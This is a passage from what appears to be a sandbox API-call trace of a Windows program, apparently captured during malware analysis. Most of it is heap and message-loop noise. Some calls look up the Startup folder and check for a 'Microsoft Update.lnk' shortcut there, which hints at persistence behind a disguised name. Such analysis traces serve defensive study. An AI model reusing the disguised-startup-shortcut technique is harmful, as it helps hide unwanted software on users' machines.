RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0238.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0238.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0238.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865490 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0238.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0238.160] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0238.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0238.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0238.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0238.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0238.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0238.161] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5c0 [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0238.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0238.161] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0238.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0238.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0238.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0238.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0238.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0238.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0238.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0238.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0238.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0238.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0238.162] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0238.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0238.163] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0238.163] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0238.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0238.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0238.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0238.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0238.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0238.163] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0238.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0238.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0238.164] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0238.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0238.164] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0238.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0238.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0238.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0238.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0238.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0238.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0238.164] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0238.164] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.164] timeGetTime () returned 0x117b7b3 [0238.164] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.164] Sleep (dwMilliseconds=0xa) [0238.205] timeGetTime () returned 0x117b7e2 [0238.205] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.205] Sleep (dwMilliseconds=0xa) [0238.252] timeGetTime () returned 0x117b811 [0238.252] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.252] Sleep (dwMilliseconds=0xa) [0238.284] timeGetTime () returned 0x117b830 [0238.284] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.284] Sleep (dwMilliseconds=0xa) [0238.320] timeGetTime () returned 0x117b84f [0238.320] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.320] Sleep (dwMilliseconds=0xa) [0238.346] timeGetTime () returned 0x117b86f [0238.346] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.346] Sleep (dwMilliseconds=0xa) [0238.372] timeGetTime () returned 0x117b87e [0238.372] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.372] Sleep (dwMilliseconds=0xa) [0238.403] timeGetTime () returned 0x117b89d [0238.403] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.403] Sleep (dwMilliseconds=0xa) [0238.439] timeGetTime () returned 0x117b8cc [0238.439] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.439] Sleep (dwMilliseconds=0xa) [0238.455] timeGetTime () returned 0x117b8dc [0238.455] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.455] Sleep (dwMilliseconds=0xa) [0238.476] timeGetTime () returned 0x117b8ec [0238.476] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.476] Sleep (dwMilliseconds=0xa) [0238.487] timeGetTime () returned 0x117b8fb [0238.487] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.487] Sleep (dwMilliseconds=0xa) [0238.502] timeGetTime () returned 0x117b90b [0238.502] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.502] Sleep (dwMilliseconds=0xa) [0238.525] timeGetTime () returned 0x117b91a [0238.525] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.525] Sleep (dwMilliseconds=0xa) [0238.548] timeGetTime () returned 0x117b939 [0238.549] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.549] Sleep (dwMilliseconds=0xa) [0238.565] timeGetTime () returned 0x117b94a [0238.565] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.565] Sleep (dwMilliseconds=0xa) [0238.581] timeGetTime () returned 0x117b95a [0238.581] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.581] Sleep (dwMilliseconds=0xa) [0238.597] timeGetTime () returned 0x117b969 [0238.597] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.597] Sleep (dwMilliseconds=0xa) [0238.612] timeGetTime () returned 0x117b979 [0238.612] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.612] Sleep (dwMilliseconds=0xa) [0238.628] timeGetTime () returned 0x117b989 [0238.628] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.628] Sleep (dwMilliseconds=0xa) [0238.643] timeGetTime () returned 0x117b998 [0238.643] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.643] Sleep (dwMilliseconds=0xa) [0238.659] timeGetTime () returned 0x117b9a8 [0238.659] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.659] Sleep (dwMilliseconds=0xa) [0238.675] timeGetTime () returned 0x117b9b7 [0238.675] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.675] Sleep (dwMilliseconds=0xa) [0238.691] timeGetTime () returned 0x117b9c7 [0238.691] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.691] Sleep (dwMilliseconds=0xa) [0238.706] timeGetTime () returned 0x117b9d7 [0238.706] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.706] Sleep (dwMilliseconds=0xa) [0238.724] timeGetTime () returned 0x117b9e6 [0238.724] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.724] Sleep (dwMilliseconds=0xa) [0238.738] timeGetTime () returned 0x117b9f6 [0238.738] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.738] Sleep (dwMilliseconds=0xa) [0238.753] timeGetTime () returned 0x117ba06 [0238.753] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.753] Sleep (dwMilliseconds=0xa) [0238.768] timeGetTime () returned 0x117ba15 [0238.768] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.768] Sleep (dwMilliseconds=0xa) [0238.784] timeGetTime () returned 0x117ba25 [0238.784] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.784] Sleep (dwMilliseconds=0xa) [0238.800] timeGetTime () returned 0x117ba34 [0238.800] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.800] Sleep (dwMilliseconds=0xa) [0238.815] timeGetTime () returned 0x117ba44 [0238.815] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.815] Sleep (dwMilliseconds=0xa) [0238.831] timeGetTime () returned 0x117ba54 [0238.831] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.831] Sleep (dwMilliseconds=0xa) [0238.846] timeGetTime () returned 0x117ba63 [0238.847] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.847] Sleep (dwMilliseconds=0xa) [0238.862] timeGetTime () returned 0x117ba73 [0238.862] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.862] Sleep (dwMilliseconds=0xa) [0238.878] timeGetTime () returned 0x117ba83 [0238.878] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.878] Sleep (dwMilliseconds=0xa) [0238.893] timeGetTime () returned 0x117ba92 [0238.893] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0238.893] TranslateMessage (lpMsg=0x8cf798) returned 0 [0238.893] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0238.893] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0238.894] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0238.894] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.894] Sleep (dwMilliseconds=0xa) [0238.909] timeGetTime () returned 0x117baa2 [0238.909] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.909] Sleep (dwMilliseconds=0xa) [0238.924] timeGetTime () returned 0x117bab2 [0238.924] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.925] 